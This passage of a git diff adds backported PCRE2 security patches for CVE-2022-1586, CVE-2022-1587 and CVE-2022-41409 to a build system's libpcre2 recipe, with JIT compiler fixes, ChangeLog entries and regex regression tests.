7Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc3]
8
9(cherry picked from commit d4fa336fbcc388f89095b184ba6d99422cfc676c)
10Signed-off-by: Shinu Chandran <shinucha@cisco.com>
11---
12 src/pcre2_jit_compile.c | 2 +-
13 1 file changed, 1 insertion(+), 1 deletion(-)
14
15diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
16index 493c96d..fa57942 100644
17--- a/src/pcre2_jit_compile.c
18+++ b/src/pcre2_jit_compile.c
19@@ -7188,7 +7188,7 @@ while (*cc != XCL_END)
20 {
21 SLJIT_ASSERT(*cc == XCL_PROP || *cc == XCL_NOTPROP);
22 cc++;
23- if (*cc == PT_CLIST && *cc == XCL_PROP)
24+ if (*cc == PT_CLIST && cc[-1] == XCL_PROP)
25 {
26 other_cases = PRIV(ucd_caseless_sets) + cc[1];
27 while (*other_cases != NOTACHAR)
28--
292.25.1
30
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch
new file mode 100644
index 0000000000..fbbbc9ca77
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1586.patch
@@ -0,0 +1,59 @@
1From 233c4248550d0c1d9bfee42198d5ee0855b7d413 Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Mon, 23 May 2022 13:52:39 +0530
4Subject: [PATCH] CVE-2022-1586
5
6Upstream-Status: Backport from https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a
7
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9---
10 ChangeLog | 3 +++
11 src/pcre2_jit_compile.c | 2 +-
12 src/pcre2_jit_test.c | 4 ++++
13 3 files changed, 8 insertions(+), 1 deletion(-)
14
15diff --git a/ChangeLog b/ChangeLog
16index 0926c29..b5d72dc 100644
17--- a/ChangeLog
18+++ b/ChangeLog
19@@ -1,6 +1,9 @@
20 Change Log for PCRE2
21 --------------------
22
23+23. Fixed a unicode properrty matching issue in JIT. The character was not
24+fully read in caseless matching.
25+
26
27 Version 10.34 21-November-2019
28 ------------------------------
29diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
30index f564127..5d43865 100644
31--- a/src/pcre2_jit_compile.c
32+++ b/src/pcre2_jit_compile.c
33@@ -7119,7 +7119,7 @@ while (*cc != XCL_END)
34 {
35 SLJIT_ASSERT(*cc == XCL_PROP || *cc == XCL_NOTPROP);
36 cc++;
37- if (*cc == PT_CLIST)
38+ if (*cc == PT_CLIST && *cc == XCL_PROP)
39 {
40 other_cases = PRIV(ucd_caseless_sets) + cc[1];
41 while (*other_cases != NOTACHAR)
42diff --git a/src/pcre2_jit_test.c b/src/pcre2_jit_test.c
43index a9b3880..9df87fd 100644
44--- a/src/pcre2_jit_test.c
45+++ b/src/pcre2_jit_test.c
46@@ -408,6 +408,10 @@ static struct regression_test_case regression_test_cases[] = {
47 { MUP, A, 0, 0 | F_PROPERTY, "[\xc3\xa2-\xc3\xa6\xc3\x81-\xc3\x84\xe2\x80\xa8-\xe2\x80\xa9\xe6\x92\xad\\p{Zs}]{2,}", "\xe2\x80\xa7\xe2\x80\xa9\xe6\x92\xad \xe6\x92\xae" },
48 { MUP, A, 0, 0 | F_PROPERTY, "[\\P{L&}]{2}[^\xc2\x85-\xc2\x89\\p{Ll}\\p{Lu}]{2}", "\xc3\xa9\xe6\x92\xad.a\xe6\x92\xad|\xc2\x8a#" },
49 { PCRE2_UCP, 0, 0, 0 | F_PROPERTY, "[a-b\\s]{2,5}[^a]", "AB baaa" },
50+ { MUP, 0, 0, 0 | F_NOMATCH, "[^\\p{Hangul}\\p{Z}]", " " },
51+ { MUP, 0, 0, 0, "[\\p{Lu}\\P{Latin}]+", "c\xEA\xA4\xAE,A,b" },
52+ { MUP, 0, 0, 0, "[\\x{a92e}\\p{Lu}\\P{Latin}]+", "c\xEA\xA4\xAE,A,b" },
53+ { CMUP, 0, 0, 0, "[^S]\\B", "\xe2\x80\x8a" },
54
55 /* Possible empty brackets. */
56 { MU, A, 0, 0, "(?:|ab||bc|a)+d", "abcxabcabd" },
57--
582.25.1
59
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch
new file mode 100644
index 0000000000..70f9f9f079
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-1587.patch
@@ -0,0 +1,660 @@
1From aa5aac0d209e3debf80fc2db924d9401fc50454b Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Mon, 23 May 2022 14:11:11 +0530
4Subject: [PATCH] CVE-2022-1587
5
6Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0]
7CVE: CVE-2022-1587
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10---
11 ChangeLog | 3 +
12 src/pcre2_jit_compile.c | 290 ++++++++++++++++++++++++++--------------
13 src/pcre2_jit_test.c | 1 +
14 3 files changed, 194 insertions(+), 100 deletions(-)
15
16diff --git a/ChangeLog b/ChangeLog
17index b5d72dc..de82de9 100644
18--- a/ChangeLog
19+++ b/ChangeLog
20@@ -4,6 +4,9 @@ Change Log for PCRE2
21 23. Fixed a unicode properrty matching issue in JIT. The character was not
22 fully read in caseless matching.
23
24+24. Fixed an issue affecting recursions in JIT caused by duplicated data
25+transfers.
26+
27
28 Version 10.34 21-November-2019
29 ------------------------------
30diff --git a/src/pcre2_jit_compile.c b/src/pcre2_jit_compile.c
31index 5d43865..493c96d 100644
32--- a/src/pcre2_jit_compile.c
33+++ b/src/pcre2_jit_compile.c
34@@ -407,6 +407,9 @@ typedef struct compiler_common {
35 /* Locals used by fast fail optimization. */
36 sljit_s32 fast_fail_start_ptr;
37 sljit_s32 fast_fail_end_ptr;
38+ /* Variables used by recursive call generator. */
39+ sljit_s32 recurse_bitset_size;
40+ uint8_t *recurse_bitset;
41
42 /* Flipped and lower case tables. */
43 const sljit_u8 *fcc;
44@@ -2109,19 +2112,39 @@ for (i = 0; i < RECURSE_TMP_REG_COUNT; i++)
45
46 #undef RECURSE_TMP_REG_COUNT
47
48+static BOOL recurse_check_bit(compiler_common *common, sljit_sw bit_index)
49+{
50+uint8_t *byte;
51+uint8_t mask;
52+
53+SLJIT_ASSERT((bit_index & (sizeof(sljit_sw) - 1)) == 0);
54+
55+bit_index >>= SLJIT_WORD_SHIFT;
56+
57+mask = 1 << (bit_index & 0x7);
58+byte = common->recurse_bitset + (bit_index >> 3);
59+
60+if (*byte & mask)
61+ return FALSE;
62+
63+*byte |= mask;
64+return TRUE;
65+}
66+
67 static int get_recurse_data_length(compiler_common *common, PCRE2_SPTR cc, PCRE2_SPTR ccend,
68 BOOL *needs_control_head, BOOL *has_quit, BOOL *has_accept)
69 {
70 int length = 1;
71-int size;
72+int size, offset;
73 PCRE2_SPTR alternative;
74 BOOL quit_found = FALSE;
75 BOOL accept_found = FALSE;
76 BOOL setsom_found = FALSE;
77 BOOL setmark_found = FALSE;
78-BOOL capture_last_found = FALSE;
79 BOOL control_head_found = FALSE;
80
81+memset(common->recurse_bitset, 0, common->recurse_bitset_size);
82+
83 #if defined DEBUG_FORCE_CONTROL_HEAD && DEBUG_FORCE_CONTROL_HEAD
84 SLJIT_ASSERT(common->control_head_ptr != 0);
85 control_head_found = TRUE;
86@@ -2144,15 +2167,17 @@ while (cc < ccend)
87 setsom_found = TRUE;
88 if (common->mark_ptr != 0)
89 setmark_found = TRUE;
90- if (common->capture_last_ptr != 0)
91- capture_last_found = TRUE;
92+ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
93+ length++;
94 cc += 1 + LINK_SIZE;
95 break;
96
97 case OP_KET:
98- if (PRIVATE_DATA(cc) != 0)
99+ offset = PRIVATE_DATA(cc);
100+ if (offset != 0)
101 {
102- length++;
103+ if (recurse_check_bit(common, offset))
104+ length++;
105 SLJIT_ASSERT(PRIVATE_DATA(cc + 1) != 0);
106 cc += PRIVATE_DATA(cc + 1);
107 }
108@@ -2169,39 +2194,55 @@ while (cc < ccend)
109 case OP_SBRA:
110 case OP_SBRAPOS:
111 case OP_SCOND:
112- length++;
113 SLJIT_ASSERT(PRIVATE_DATA(cc) != 0);
114+ if (recurse_check_bit(common, PRIVATE_DATA(cc)))
115+ length++;
116 cc += 1 + LINK_SIZE;
117 break;
118
119 case OP_CBRA:
120 case OP_SCBRA:
121- length += 2;
122- if (common->capture_last_ptr != 0)
123- capture_last_found = TRUE;
124- if (common->optimized_cbracket[GET2(cc, 1 + LINK_SIZE)] == 0)
125+ offset = GET2(cc, 1 + LINK_SIZE);
126+ if (recurse_check_bit(common, OVECTOR(offset << 1)))
127+ {
128+ SLJIT_ASSERT(recurse_check_bit(common, OVECTOR((offset << 1) + 1)));
129+ length += 2;
130+ }
131+ if (common->optimized_cbracket[offset] == 0 && recurse_check_bit(common, OVECTOR_PRIV(offset)))
132+ length++;
133+ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
134 length++;
135 cc += 1 + LINK_SIZE + IMM2_SIZE;
136 break;
137
138 case OP_CBRAPOS:
139 case OP_SCBRAPOS:
140- length += 2 + 2;
141- if (common->capture_last_ptr != 0)
142- capture_last_found = TRUE;
143+ offset = GET2(cc, 1 + LINK_SIZE);
144+ if (recurse_check_bit(common, OVECTOR(offset << 1)))
145+ {
146+ SLJIT_ASSERT(recurse_check_bit(common, OVECTOR((offset << 1) + 1)));
147+ length += 2;
148+ }
149+ if (recurse_check_bit(common, OVECTOR_PRIV(offset)))
150+ length++;
151+ if (recurse_check_bit(common, PRIVATE_DATA(cc)))
152+ length++;
153+ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
154+ length++;
155 cc += 1 + LINK_SIZE + IMM2_SIZE;
156 break;
157
158 case OP_COND:
159 /* Might be a hidden SCOND. */
160 alternative = cc + GET(cc, 1);
161- if (*alternative == OP_KETRMAX || *alternative == OP_KETRMIN)
162+ if ((*alternative == OP_KETRMAX || *alternative == OP_KETRMIN) && recurse_check_bit(common, PRIVATE_DATA(cc)))
163 length++;
164 cc += 1 + LINK_SIZE;
165 break;
166
167 CASE_ITERATOR_PRIVATE_DATA_1
168- if (PRIVATE_DATA(cc) != 0)
169+ offset = PRIVATE_DATA(cc);
170+ if (offset != 0 && recurse_check_bit(common, offset))
171 length++;
172 cc += 2;
173 #ifdef SUPPORT_UNICODE
174@@ -2210,8 +2251,12 @@ while (cc < ccend)
175 break;
176
177 CASE_ITERATOR_PRIVATE_DATA_2A
178- if (PRIVATE_DATA(cc) != 0)
179+ offset = PRIVATE_DATA(cc);
180+ if (offset != 0 && recurse_check_bit(common, offset))
181+ {
182+ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
183 length += 2;
184+ }
185 cc += 2;
186 #ifdef SUPPORT_UNICODE
187 if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
188@@ -2219,8 +2264,12 @@ while (cc < ccend)
189 break;
190
191 CASE_ITERATOR_PRIVATE_DATA_2B
192- if (PRIVATE_DATA(cc) != 0)
193+ offset = PRIVATE_DATA(cc);
194+ if (offset != 0 && recurse_check_bit(common, offset))
195+ {
196+ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
197 length += 2;
198+ }
199 cc += 2 + IMM2_SIZE;
200 #ifdef SUPPORT_UNICODE
201 if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
202@@ -2228,20 +2277,29 @@ while (cc < ccend)
203 break;
204
205 CASE_ITERATOR_TYPE_PRIVATE_DATA_1
206- if (PRIVATE_DATA(cc) != 0)
207+ offset = PRIVATE_DATA(cc);
208+ if (offset != 0 && recurse_check_bit(common, offset))
209 length++;
210 cc += 1;
211 break;
212
213 CASE_ITERATOR_TYPE_PRIVATE_DATA_2A
214- if (PRIVATE_DATA(cc) != 0)
215+ offset = PRIVATE_DATA(cc);
216+ if (offset != 0 && recurse_check_bit(common, offset))
217+ {
218+ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
219 length += 2;
220+ }
221 cc += 1;
222 break;
223
224 CASE_ITERATOR_TYPE_PRIVATE_DATA_2B
225- if (PRIVATE_DATA(cc) != 0)
226+ offset = PRIVATE_DATA(cc);
227+ if (offset != 0 && recurse_check_bit(common, offset))
228+ {
229+ SLJIT_ASSERT(recurse_check_bit(common, offset + sizeof(sljit_sw)));
230 length += 2;
231+ }
232 cc += 1 + IMM2_SIZE;
233 break;
234
235@@ -2253,7 +2311,9 @@ while (cc < ccend)
236 #else
237 size = 1 + 32 / (int)sizeof(PCRE2_UCHAR);
238 #endif
239- if (PRIVATE_DATA(cc) != 0)
240+
241+ offset = PRIVATE_DATA(cc);
242+ if (offset != 0 && recurse_check_bit(common, offset))
243 length += get_class_iterator_size(cc + size);
244 cc += size;
245 break;
246@@ -2288,8 +2348,7 @@ while (cc < ccend)
247 case OP_THEN:
248 SLJIT_ASSERT(common->control_head_ptr != 0);
249 quit_found = TRUE;
250- if (!control_head_found)
251- control_head_found = TRUE;
252+ control_head_found = TRUE;
253 cc++;
254 break;
255
256@@ -2309,8 +2368,6 @@ SLJIT_ASSERT(cc == ccend);
257
258 if (control_head_found)
259 length++;
260-if (capture_last_found)
261- length++;
262 if (quit_found)
263 {
264 if (setsom_found)
265@@ -2343,14 +2400,12 @@ sljit_sw shared_srcw[3];
266 sljit_sw kept_shared_srcw[2];
267 int private_count, shared_count, kept_shared_count;
268 int from_sp, base_reg, offset, i;
269-BOOL setsom_found = FALSE;
270-BOOL setmark_found = FALSE;
271-BOOL capture_last_found = FALSE;
272-BOOL control_head_found = FALSE;
273+
274+memset(common->recurse_bitset, 0, common->recurse_bitset_size);
275
276 #if defined DEBUG_FORCE_CONTROL_HEAD && DEBUG_FORCE_CONTROL_HEAD
277 SLJIT_ASSERT(common->control_head_ptr != 0);
278-control_head_found = TRUE;
279+recurse_check_bit(common, common->control_head_ptr);
280 #endif
281
282 switch (type)
283@@ -2438,11 +2493,10 @@ while (cc < ccend)
284 {
285 case OP_SET_SOM:
286 SLJIT_ASSERT(common->has_set_som);
287- if (has_quit && !setsom_found)
288+ if (has_quit && recurse_check_bit(common, OVECTOR(0)))
289 {
290 kept_shared_srcw[0] = OVECTOR(0);
291 kept_shared_count = 1;
292- setsom_found = TRUE;
293 }
294 cc += 1;
295 break;
296@@ -2450,33 +2504,31 @@ while (cc < ccend)
297 case OP_RECURSE:
298 if (has_quit)
299 {
300- if (common->has_set_som && !setsom_found)
301+ if (common->has_set_som && recurse_check_bit(common, OVECTOR(0)))
302 {
303 kept_shared_srcw[0] = OVECTOR(0);
304 kept_shared_count = 1;
305- setsom_found = TRUE;
306 }
307- if (common->mark_ptr != 0 && !setmark_found)
308+ if (common->mark_ptr != 0 && recurse_check_bit(common, common->mark_ptr))
309 {
310 kept_shared_srcw[kept_shared_count] = common->mark_ptr;
311 kept_shared_count++;
312- setmark_found = TRUE;
313 }
314 }
315- if (common->capture_last_ptr != 0 && !capture_last_found)
316+ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
317 {
318 shared_srcw[0] = common->capture_last_ptr;
319 shared_count = 1;
320- capture_last_found = TRUE;
321 }
322 cc += 1 + LINK_SIZE;
323 break;
324
325 case OP_KET:
326- if (PRIVATE_DATA(cc) != 0)
327+ private_srcw[0] = PRIVATE_DATA(cc);
328+ if (private_srcw[0] != 0)
329 {
330- private_count = 1;
331- private_srcw[0] = PRIVATE_DATA(cc);
332+ if (recurse_check_bit(common, private_srcw[0]))
333+ private_count = 1;
334 SLJIT_ASSERT(PRIVATE_DATA(cc + 1) != 0);
335 cc += PRIVATE_DATA(cc + 1);
336 }
337@@ -2493,50 +2545,66 @@ while (cc < ccend)
338 case OP_SBRA:
339 case OP_SBRAPOS:
340 case OP_SCOND:
341- private_count = 1;
342 private_srcw[0] = PRIVATE_DATA(cc);
343+ if (recurse_check_bit(common, private_srcw[0]))
344+ private_count = 1;
345 cc += 1 + LINK_SIZE;
346 break;
347
348 case OP_CBRA:
349 case OP_SCBRA:
350- offset = (GET2(cc, 1 + LINK_SIZE)) << 1;
351- shared_srcw[0] = OVECTOR(offset);
352- shared_srcw[1] = OVECTOR(offset + 1);
353- shared_count = 2;
354+ offset = GET2(cc, 1 + LINK_SIZE);
355+ shared_srcw[0] = OVECTOR(offset << 1);
356+ if (recurse_check_bit(common, shared_srcw[0]))
357+ {
358+ shared_srcw[1] = shared_srcw[0] + sizeof(sljit_sw);
359+ SLJIT_ASSERT(recurse_check_bit(common, shared_srcw[1]));
360+ shared_count = 2;
361+ }
362
363- if (common->capture_last_ptr != 0 && !capture_last_found)
364+ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
365 {
366- shared_srcw[2] = common->capture_last_ptr;
367- shared_count = 3;
368- capture_last_found = TRUE;
369+ shared_srcw[shared_count] = common->capture_last_ptr;
370+ shared_count++;
371 }
372
373- if (common->optimized_cbracket[GET2(cc, 1 + LINK_SIZE)] == 0)
374+ if (common->optimized_cbracket[offset] == 0)
375 {
376- private_count = 1;
377- private_srcw[0] = OVECTOR_PRIV(GET2(cc, 1 + LINK_SIZE));
378+ private_srcw[0] = OVECTOR_PRIV(offset);
379+ if (recurse_check_bit(common, private_srcw[0]))
380+ private_count = 1;
381 }
382+
383 cc += 1 + LINK_SIZE + IMM2_SIZE;
384 break;
385
386 case OP_CBRAPOS:
387 case OP_SCBRAPOS:
388- offset = (GET2(cc, 1 + LINK_SIZE)) << 1;
389- shared_srcw[0] = OVECTOR(offset);
390- shared_srcw[1] = OVECTOR(offset + 1);
391- shared_count = 2;
392+ offset = GET2(cc, 1 + LINK_SIZE);
393+ shared_srcw[0] = OVECTOR(offset << 1);
394+ if (recurse_check_bit(common, shared_srcw[0]))
395+ {
396+ shared_srcw[1] = shared_srcw[0] + sizeof(sljit_sw);
397+ SLJIT_ASSERT(recurse_check_bit(common, shared_srcw[1]));
398+ shared_count = 2;
399+ }
400
401- if (common->capture_last_ptr != 0 && !capture_last_found)
402+ if (common->capture_last_ptr != 0 && recurse_check_bit(common, common->capture_last_ptr))
403 {
404- shared_srcw[2] = common->capture_last_ptr;
405- shared_count = 3;
406- capture_last_found = TRUE;
407+ shared_srcw[shared_count] = common->capture_last_ptr;
408+ shared_count++;
409 }
410
411- private_count = 2;
412 private_srcw[0] = PRIVATE_DATA(cc);
413- private_srcw[1] = OVECTOR_PRIV(GET2(cc, 1 + LINK_SIZE));
414+ if (recurse_check_bit(common, private_srcw[0]))
415+ private_count = 1;
416+
417+ offset = OVECTOR_PRIV(offset);
418+ if (recurse_check_bit(common, offset))
419+ {
420+ private_srcw[private_count] = offset;
421+ private_count++;
422+ }
423 cc += 1 + LINK_SIZE + IMM2_SIZE;
424 break;
425
426@@ -2545,18 +2613,17 @@ while (cc < ccend)
427 alternative = cc + GET(cc, 1);
428 if (*alternative == OP_KETRMAX || *alternative == OP_KETRMIN)
429 {
430- private_count = 1;
431 private_srcw[0] = PRIVATE_DATA(cc);
432+ if (recurse_check_bit(common, private_srcw[0]))
433+ private_count = 1;
434 }
435 cc += 1 + LINK_SIZE;
436 break;
437
438 CASE_ITERATOR_PRIVATE_DATA_1
439- if (PRIVATE_DATA(cc))
440- {
441+ private_srcw[0] = PRIVATE_DATA(cc);
442+ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
443 private_count = 1;
444- private_srcw[0] = PRIVATE_DATA(cc);
445- }
446 cc += 2;
447 #ifdef SUPPORT_UNICODE
448 if (common->utf && HAS_EXTRALEN(cc[-1])) cc += GET_EXTRALEN(cc[-1]);
449@@ -2564,11 +2631,12 @@ while (cc < ccend)
450 break;
451
452 CASE_ITERATOR_PRIVATE_DATA_2A
453- if (PRIVATE_DATA(cc))
454+ private_srcw[0] = PRIVATE_DATA(cc);
455+ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
456 {
457 private_count = 2;
458- private_srcw[0] = PRIVATE_DATA(cc);
459- private_srcw[1] = PRIVATE_DATA(cc) + sizeof(sljit_sw);
460+ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
461+ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
462 }
463 cc += 2;
464 #ifdef SUPPORT_UNICODE
465@@ -2577,11 +2645,12 @@ while (cc < ccend)
466 break;
467
468 CASE_ITERATOR_PRIVATE_DATA_2B
469- if (PRIVATE_DATA(cc))
470+ private_srcw[0] = PRIVATE_DATA(cc);
471+ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
472 {
473 private_count = 2;
474- private_srcw[0] = PRIVATE_DATA(cc);
475- private_srcw[1] = PRIVATE_DATA(cc) + sizeof(sljit_sw);
476+ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
477+ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
478 }
479 cc += 2 + IMM2_SIZE;
480 #ifdef SUPPORT_UNICODE
481@@ -2590,30 +2659,30 @@ while (cc < ccend)
482 break;
483
484 CASE_ITERATOR_TYPE_PRIVATE_DATA_1
485- if (PRIVATE_DATA(cc))
486- {
487+ private_srcw[0] = PRIVATE_DATA(cc);
488+ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
489 private_count = 1;
490- private_srcw[0] = PRIVATE_DATA(cc);
491- }
492 cc += 1;
493 break;
494
495 CASE_ITERATOR_TYPE_PRIVATE_DATA_2A
496- if (PRIVATE_DATA(cc))
497+ private_srcw[0] = PRIVATE_DATA(cc);
498+ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
499 {
500 private_count = 2;
501- private_srcw[0] = PRIVATE_DATA(cc);
502 private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
503+ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
504 }
505 cc += 1;
506 break;
507
508 CASE_ITERATOR_TYPE_PRIVATE_DATA_2B
509- if (PRIVATE_DATA(cc))
510+ private_srcw[0] = PRIVATE_DATA(cc);
511+ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
512 {
513 private_count = 2;
514- private_srcw[0] = PRIVATE_DATA(cc);
515 private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
516+ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
517 }
518 cc += 1 + IMM2_SIZE;
519 break;
520@@ -2630,14 +2699,17 @@ while (cc < ccend)
521 switch(get_class_iterator_size(cc + i))
522 {
523 case 1:
524- private_count = 1;
525 private_srcw[0] = PRIVATE_DATA(cc);
526 break;
527
528 case 2:
529- private_count = 2;
530 private_srcw[0] = PRIVATE_DATA(cc);
531- private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
532+ if (recurse_check_bit(common, private_srcw[0]))
533+ {
534+ private_count = 2;
535+ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
536+ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
537+ }
538 break;
539
540 default:
541@@ -2652,28 +2724,25 @@ while (cc < ccend)
542 case OP_PRUNE_ARG:
543 case OP_THEN_ARG:
544 SLJIT_ASSERT(common->mark_ptr != 0);
545- if (has_quit && !setmark_found)
546+ if (has_quit && recurse_check_bit(common, common->mark_ptr))
547 {
548 kept_shared_srcw[0] = common->mark_ptr;
549 kept_shared_count = 1;
550- setmark_found = TRUE;
551 }
552- if (common->control_head_ptr != 0 && !control_head_found)
553+ if (common->control_head_ptr != 0 && recurse_check_bit(common, common->control_head_ptr))
554 {
555 shared_srcw[0] = common->control_head_ptr;
556 shared_count = 1;
557- control_head_found = TRUE;
558 }
559 cc += 1 + 2 + cc[1];
560 break;
561
562 case OP_THEN:
563 SLJIT_ASSERT(common->control_head_ptr != 0);
564- if (!control_head_found)
565+ if (recurse_check_bit(common, common->control_head_ptr))
566 {
567 shared_srcw[0] = common->control_head_ptr;
568 shared_count = 1;
569- control_head_found = TRUE;
570 }
571 cc++;
572 break;
573@@ -2681,7 +2750,7 @@ while (cc < ccend)
574 default:
575 cc = next_opcode(common, cc);
576 SLJIT_ASSERT(cc != NULL);
577- break;
578+ continue;
579 }
580
581 if (type != recurse_copy_shared_to_global && type != recurse_copy_kept_shared_to_global)
582@@ -13262,7 +13331,7 @@ SLJIT_ASSERT(!(common->req_char_ptr != 0 && common->start_used_ptr != 0));
583 common->cbra_ptr = OVECTOR_START + (re->top_bracket + 1) * 2 * sizeof(sljit_sw);
584
585 total_length = ccend - common->start;
586-common->private_data_ptrs = (sljit_s32 *)SLJIT_MALLOC(total_length * (sizeof(sljit_s32) + (common->has_then ? 1 : 0)), allocator_data);
587+common->private_data_ptrs = (sljit_s32*)SLJIT_MALLOC(total_length * (sizeof(sljit_s32) + (common->has_then ? 1 : 0)), allocator_data);
588 if (!common->private_data_ptrs)
589 {
590 SLJIT_FREE(common->optimized_cbracket, allocator_data);
591@@ -13304,6 +13373,7 @@ if (!compiler)
592 common->compiler = compiler;
593
594 /* Main pcre_jit_exec entry. */
595+LJIT_ASSERT((private_data_size & (sizeof(sljit_sw) - 1)) == 0);
596 sljit_emit_enter(compiler, 0, SLJIT_ARG1(SW), 5, 5, 0, 0, private_data_size);
597
598 /* Register init. */
599@@ -13524,20 +13594,40 @@ common->fast_fail_end_ptr = 0;
600 common->currententry = common->entries;
601 common->local_quit_available = TRUE;
602 quit_label = common->quit_label;
603-while (common->currententry != NULL)
604+if (common->currententry != NULL)
605 {
606- /* Might add new entries. */
607- compile_recurse(common);
608- if (SLJIT_UNLIKELY(sljit_get_compiler_error(compiler)))
609+ /* A free bit for each private data. */
610+ common->recurse_bitset_size = ((private_data_size / (int)sizeof(sljit_sw)) + 7) >> 3;
611+ SLJIT_ASSERT(common->recurse_bitset_size > 0);
612+ common->recurse_bitset = (sljit_u8*)SLJIT_MALLOC(common->recurse_bitset_size, allocator_data);;
613+
614+ if (common->recurse_bitset != NULL)
615+ {
616+ do
617+ {
618+ /* Might add new entries. */
619+ compile_recurse(common);
620+ if (SLJIT_UNLIKELY(sljit_get_compiler_error(compiler)))
621+ break;
622+ flush_stubs(common);
623+ common->currententry = common->currententry->next;
624+ }
625+ while (common->currententry != NULL);
626+
627+ SLJIT_FREE(common->recurse_bitset, allocator_data);
628+ }
629+
630+ if (common->currententry != NULL)
631 {
632+ /* The common->recurse_bitset has been freed. */
633+ SLJIT_ASSERT(sljit_get_compiler_error(compiler) || common->recurse_bitset == NULL);
634+
635 sljit_free_compiler(compiler);
636 SLJIT_FREE(common->optimized_cbracket, allocator_data);
637 SLJIT_FREE(common->private_data_ptrs, allocator_data);
638 PRIV(jit_free_rodata)(common->read_only_data_head, allocator_data);
639 return PCRE2_ERROR_NOMEMORY;
640 }
641- flush_stubs(common);
642- common->currententry = common->currententry->next;
643 }
644 common->local_quit_available = FALSE;
645 common->quit_label = quit_label;
646diff --git a/src/pcre2_jit_test.c b/src/pcre2_jit_test.c
647index 9df87fd..2f84834 100644
648--- a/src/pcre2_jit_test.c
649+++ b/src/pcre2_jit_test.c
650@@ -746,6 +746,7 @@ static struct regression_test_case regression_test_cases[] = {
651 { MU, A, 0, 0, "((?(R)a|(?1)){1,3}?)M", "aaaM" },
652 { MU, A, 0, 0, "((.)(?:.|\\2(?1))){0}#(?1)#", "#aabbccdde# #aabbccddee#" },
653 { MU, A, 0, 0, "((.)(?:\\2|\\2{4}b)){0}#(?:(?1))+#", "#aaaab# #aaaaab#" },
654+ { MU, A, 0, 0 | F_NOMATCH, "(?1)$((.|\\2xx){1,2})", "abc" },
655
656 /* 16 bit specific tests. */
657 { CM, A, 0, 0 | F_FORCECONV, "\xc3\xa1", "\xc3\x81\xc3\xa1" },
658--
6592.25.1
660
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch
new file mode 100644
index 0000000000..882277ae73
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch
@@ -0,0 +1,74 @@
1From 94e1c001761373b7d9450768aa15d04c25547a35 Mon Sep 17 00:00:00 2001
2From: Philip Hazel <Philip.Hazel@gmail.com>
3Date: Tue, 16 Aug 2022 17:00:45 +0100
4Subject: [PATCH] Diagnose negative repeat value in pcre2test subject line
5
6CVE: CVE-2022-41409
7Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/94e1c001761373b7d9450768aa15d04c25547a35]
8
9Signed-off-by: Peter Marko <peter.marko@siemens.com>
10
11---
12 ChangeLog | 3 +++
13 src/pcre2test.c | 4 ++--
14 testdata/testinput2 | 3 +++
15 testdata/testoutput2 | 4 ++++
16 4 files changed, 12 insertions(+), 2 deletions(-)
17
18diff --git a/ChangeLog b/ChangeLog
19index eab50eb7..276eb57a 100644
20--- a/ChangeLog
21+++ b/ChangeLog
22@@ -7,6 +7,9 @@ fully read in caseless matching.
23 24. Fixed an issue affecting recursions in JIT caused by duplicated data
24 transfers.
25
26+20. A negative repeat value in a pcre2test subject line was not being
27+diagnosed, leading to infinite looping.
28+
29
30 Version 10.34 21-November-2019
31 ------------------------------
32diff --git a/src/pcre2test.c b/src/pcre2test.c
33index 08f86096..f6f5d66c 100644
34--- a/src/pcre2test.c
35+++ b/src/pcre2test.c
36@@ -6700,9 +6700,9 @@ while ((c = *p++) != 0)
37 }
38
